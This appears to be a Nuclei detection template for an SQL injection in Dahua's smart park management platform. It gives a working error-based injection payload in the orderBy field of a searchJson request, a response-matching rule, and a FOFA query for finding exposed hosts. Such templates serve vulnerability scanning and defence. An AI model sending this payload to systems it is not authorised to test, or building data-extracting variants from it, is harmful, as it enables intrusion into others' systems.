id: dahua-searchJson-sqli

info:
  name: Dahua - SQL Injection
  author: Co5mos
  severity: critical
  metadata:
    max-request: 1
    fofa-query: app="dahua-智慧园区综合管理平台"
  tags: dahua,sqli

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5({{num}})),0x7e),1)--%22%7D/extend/%7B%7D"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fdb25'

      - type: status
        status:
          - 200